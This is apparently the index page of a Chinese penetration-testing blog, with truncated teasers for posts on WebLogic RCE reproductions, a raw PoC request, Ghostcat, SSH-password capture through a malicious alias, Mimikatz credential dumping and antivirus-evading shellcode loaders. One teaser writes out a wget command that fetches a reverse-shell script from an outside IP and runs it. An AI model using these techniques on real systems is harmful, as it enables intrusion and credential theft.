Wed Apr 29
前言:     公司项目上遇到的一个传销站,是一个Thinkphp3.0的。尝试了payload进行注入后,发现只有一个盲注。 于是就去找找有没有相同站点,拿个源码来审计审计。 搜索到一个相同站点下存在8009端口的ajp协议和一个8080端口的tomcat站点,于是就想到了幽灵猫漏洞。 发现
阅读更多
Wed Apr 22
直接上POC 热乎着的 GET /general/login_code.php HTTP/1.1 Host: 192.168.91.131 Pragma: no-cache Cache-Control: no-cache Upgrade-Insecure-Requests: 1 User-Agent
阅读更多
Fri Apr 17
「漏洞复现」CVE-2020-2555-Oracle Coherence&WebLogic反序列化远程代码执行 我的环境 靶机: windows2008 r2 datacenter java jdk8u202 weblogic 12.2.1.3.0 ip:192.168.91.131 攻
阅读更多
Thu Apr 16
Weblogic CVE-2020-2551 IIOP协议反序列化RCE 看到weblogic的这个漏洞,想着到时候hw的时候应该可以利用下。。。。 环境搭建 github上有个大佬,已经把环境脚本全部配置好了。 https://github.com/cnsimo/CVE-2020-2551 但
阅读更多

「Tips」命令执行无回显无法反弹shell的后续操作

我一般在遇到Java反序列化可以命令执行后,会选择用python的方式反弹shell。 先wget下载 wget http://123.123.123.123/shell.py -O /tmp/shell.py 然后再执行 python /tmp/shell.py 这样一般不用去考虑符号带来的

Linux下低权限用户记录SSH的密码

实现思路     当用户执行 ssh user@remotehost 时,实际上执行的是我的恶意脚本,负责将用户输入的密码存在本地,并传参给正常的SSH连接,实现抓取SSH密码的功能。 具体步骤 首先使用 alias 命令创建一个别名 这样当用户执行ssh时,执行的是指定的脚本 alias ssh=

[转载]DEVCORE 红队的进化,与下一步

前言     「红队演练」近年来渐渐开始被大家提及,也开始有一些厂商推出红队服务。不过关于在台湾红队是怎么做的就比较少人公开分享,身为第一个在台湾推红队演练的公司,我想就根据这两年多来的实战经验,分享为什么我们要做红队、我们面临到的问题、以及在我们心中认为红队成员应该具备的特质。最后再分享我们现阶段

ATT&CK技术-T1003-Credential Dumping

Credential Dumping 凭证转储 ID: T1003 Source: https://attack.mitre.org/techniques/T1003/ Details ProcDump and Mimikatz 下载 ProcDump 工具到需要抓取密码的那台主机上:

使用Simple-Loader绕过杀软

环境: Language: C# .NET Framework 4.0 Visual Studio 2019 (community) Build Architecture: x64 Shell Code: MSFVenom windows/exec x32 或者 Cobal Strike x32

ATT&CK技术-T1223-Compiled HTML File

    CHM文件是各种内容的压缩编译,例如HTML文档,图像和脚本/ Web相关的编程语言,如VBA,JScript,Java和ActiveX。内容使用HTML Help executable program(hh.exe)加载的Internet Explorer浏览器基础组件显示。     
Your browser is out-of-date!

Update your browser to view this website correctly. Update my browser now

×